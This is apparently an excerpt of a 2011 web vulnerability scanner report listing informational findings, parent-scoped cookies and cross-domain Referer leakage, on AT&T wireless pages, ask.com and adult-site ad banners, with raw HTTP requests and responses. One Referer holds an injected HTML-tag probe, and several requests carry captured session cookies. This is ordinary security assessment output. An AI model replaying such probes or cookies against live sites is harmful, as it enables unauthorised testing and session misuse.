Location: http://www.att.com/homepage/sitemap/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 15 Aug 2011 18:20:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTHID=3B897B64C76B10C7A218A9FCD465FFF0; Path=/; Domain=.att.com
Set-Cookie: TLTSID=3B897B64C76B10C7A218A9FCD465FFF0; Path=/; Domain=.att.com
Set-Cookie: TLTUID=3B897B64C76B10C7A218A9FCD465FFF0; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:20:19 GMT
Set-Cookie: B2CSESSIONID=hFZCTJjDHKQ8yx!587287761; path=/; HttpOnly
Set-Cookie: BIGipServerpWL_7010_7011=466735495.25115.0000; path=/
Content-Length: 2



12.77. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135031
Expires: Mon, 15 Aug 2011 18:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:04 GMT
Connection: close
Set-Cookie: TLTHID=31FEFBDCC76B10C7BCD0FCE33BDE3340; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...

12.78. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/netbook-packages.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/packages/netbook-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55%3E%3Ca%20b%3dc%3E17435fcd4f5
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.4.10.1313431966; TLTHID=9C4648E2C76B10C7B846FFAD8CC90BB7; TLTSID=9C4648E2C76B10C7B846FFAD8CC90BB7; BIGipServerpWL_7010_7011=2060571015.25115.0000; fsr.a=1313432642829; wtAka=y

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 91395
Expires: Mon, 15 Aug 2011 18:23:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:23:08 GMT
Connection: close
Set-Cookie: TLTHID=A01F50D0C76B10C7BEB5A17F0D25FB73; Path=/; Domain=.att.com


                                                                           
...[SNIP]...

12.79. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/windows-packages.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cell-phone-service/packages/windows-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.2.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; B2CSESSIONID=1fKdTJjTTvqPt1!1142544054; DYN_USER_ID=4148005476; DYN_USER_CONFIRM=d958665c301d296eb3ee49e91430ee35; BIGipServerpWL_7010_7011=3989950855.25115.0000; wtAka=y; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001693504923%22%2C%22poc_login%22%3A%22no%22%2C%22bus_support%22%3A%22no%22%2C%22ufix%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22015A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221313432472549_500300%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d9%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A9%2C%22sd%22%3A9%7D; __utmc=241758596; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22r%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22t%22%3A1313432484011%2C%22u%22%3A%226923670900791695274%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22l%22%3A%22Windows%C2%AE%20Packages%22%2C%22de%22%3A%7B%22su%22%3A%22Find%20great%20free%20Phone%20deals%20and%20packages%20at%20AT%26T%20that%20can%20help%20save%20you%20money%20at%20AT%26T.%20Wireless%20from%20AT%26T.%20Wireless%20from%20AT%26T.%22%2C%22ti%22%3A%22Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T%22%2C%22nw%22%3A1812%2C%22nl%22%3A185%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 103697
Expires: Mon, 15 Aug 2011 18:20:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:32 GMT
Connection: close
Set-Cookie: TLTHID=43172EBCC76B10C7CFD7C47F0B9E96D6; Path=/; Domain=.att.com


                                                                       
...[SNIP]...

12.80. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 09 Aug 2011 22:05:54 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 6614
Expires: Mon, 15 Aug 2011 18:19:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:20 GMT
Connection: close
Set-Cookie: TLTHID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTSID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com
Set-Cookie: TLTUID=18769A94C76B10C79C4BC90C512E969D; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:20 GMT
Set-Cookie: BIGipServerpWL_7010_7011=248631687.25115.0000; path=/

GIF89a_...................................l..............=;;pw.ECB...............JKL-+)QRT...............R]/.....422,.....%#"=Js\\].........cbd...zzy.........srr...............lji......X......
   ...`
...[SNIP]...

12.81. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/globemaintenance.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store_maintenance/images/globemaintenance.gif?01RI=0F8495D0A0133CD&01CM=cm:akamai.mathtag.com&01NA=ck& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39843
Expires: Mon, 15 Aug 2011 18:20:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:43 GMT
Connection: close
Set-Cookie: TLTHID=49D56B56C76B10C79A33B13681FBD5E5; Path=/; Domain=.att.com


                                                                                   
...[SNIP]...

12.82. http://www.wireless.att.com/store_maintenance/images/page_btmSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/page_btmSlice.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store_maintenance/images/page_btmSlice.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.wireless.att.com
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39776
Expires: Mon, 15 Aug 2011 18:19:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:19:48 GMT
Connection: close
Set-Cookie: TLTHID=290CABA0C76B10C7AD38AD5A639CB7BF; Path=/; Domain=.att.com
Set-Cookie: TLTSID=290CABA0C76B10C7AD38AD5A639CB7BF; Path=/; Domain=.att.com
Set-Cookie: TLTUID=290CABA0C76B10C7AD38AD5A639CB7BF; Path=/; Domain=.att.com; Expires=Mon, 15-08-2021 18:19:48 GMT
Set-Cookie: B2CSESSIONID=TDvJTJjGvPQVz4!1142544054; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148005471; path=/
Set-Cookie: DYN_USER_CONFIRM=0bc1e36676ae0e394fe208fe63bb9e95; path=/
Set-Cookie: ECOM_GTM=NA_osbth; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: cust_type=new; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: browserid=A001701433188; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: svariants=NA; domain=.att.com; expires=Tuesday, 14-Aug-2012 18:19:48 GMT; path=/
Set-Cookie: BIGipServerpWL_7010_7011=3989950855.25115.0000; path=/


                                                                                   
...[SNIP]...

12.83. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wireless.att.com
Path:   /store_maintenance/images/page_midSlice.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store_maintenance/images/page_midSlice.gif?01RI=1946BF68A41E07A&01CM=cm:akamai.mathtag.com&01NA=ck& HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Cookie: DL3K=3_qhKQM4yElO69ddjfeyjVrK9h8w0Y7a0dATxb_LpGntZyBg59oJM8Q
Host: www.wireless.att.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39843
Expires: Mon, 15 Aug 2011 18:20:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:43 GMT
Connection: close
Set-Cookie: TLTHID=49D5C484C76B10C7C0C896712A89A4E2; Path=/; Domain=.att.com


                                                                                   
...[SNIP]...

12.84. http://wzus1.ask.com/i/i.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /i/i.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&ld=1068&sv=0a5c407c&p=news&ord=2733532&cu.wz=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: wzus1.ask.com

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:28:06 GMT
Set-Cookie: wz_uid=0241E846986E52306D32291A797EB06A; path=/; expires=Wed, 14-Aug-2013 18:28:06 GMT; domain=.ask.com
Set-Cookie: wz_sid=0B44E444986E52306D32291A797EB06A; path=/; expires=Mon, 15-Aug-2011 18:58:06 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Wed, 14-Aug-2013 18:28:06 GMT; domain=.ask.com
Location: http://wzus1.ask.com/i/i.gif?t=S&d=us&s=a&c=bntps&app=a14&l=dir&o=0&ld=1068&sv=0a5c407c&p=news&ord=2733532&cu.wz=0&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&cu.wz=0&cu=0&cs=0&__utma=0&__utmb=0&__utmc=0&__utmz=0&__utmv=0&__utmx=0&
Content-Length: 564
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/i/i.gif?t=S&amp;d=us&amp;s
...[SNIP]...

13. Cross-domain Referer leakage  previous  next
There are 60 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


13.1. http://a2.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.mediagra.com
Path:   /b.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b.php?s=13 HTTP/1.1
Host: a2.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrSyMDG0BvOT80pAfCPrWgA%3D; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 740
Date: Mon, 15 Aug 2011 19:05:49 GMT
X-Varnish: 1909287838
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/jquery-1.4.2.min.js'></script><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/mediagra.js?20'></script><link href='http://static.xhamster.com/css/banners.css' rel='stylesheet' type='text/css'><meta http-equiv='Pragma' content='no-cache'>
...[SNIP]...
<body><iframe width='140' height='1800' frameborder='0' scrolling='no' name='' marginwidth='0' marginheight='0' src='http://ifa.camads.net/dif/?cid=xhamstercams-140x1800'></iframe>
...[SNIP]...

13.2. http://a5.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a5.mediagra.com
Path:   /b.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /b.php?s=13 HTTP/1.1
Host: a5.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.2
Date: Mon, 15 Aug 2011 18:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrQyMjS2BvOT80rAfOtaAA%3D%3D; path=/
Content-Length: 838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/jquery-1.4.2.min.js'></script><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/mediagra.js?20'></script><link href='http://static.xhamster.com/css/banners.css' rel='stylesheet' type='text/css'><meta http-equiv='Pragma' content='no-cache'>
...[SNIP]...
<body><a href='http://www.3dtoontube.com/?t=3dxham' onmousedown="clickDown(this,'b.php?click=aWQ6MjAyNyx1cmw6aHR0cCUzQSUyRiUyRnd3dy4zZHRvb250dWJlLmNvbSUyRiUzRnQlM0QzZHhoYW0%3D')" target='_blank'><img width='140' height='1800' src='http://st1.mediagra.com/x/1992_903513.jpg'/>
...[SNIP]...

13.3. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.7

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.7;sz=728x90;ord=76407451872406880;click=http://pixel.mathtag.com/click/img?mt_aid=76407451872406880&mt_id=112511&mt_adid=100488&mt_uuid=4e394114-5150-5bce-73fa-628197421391&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
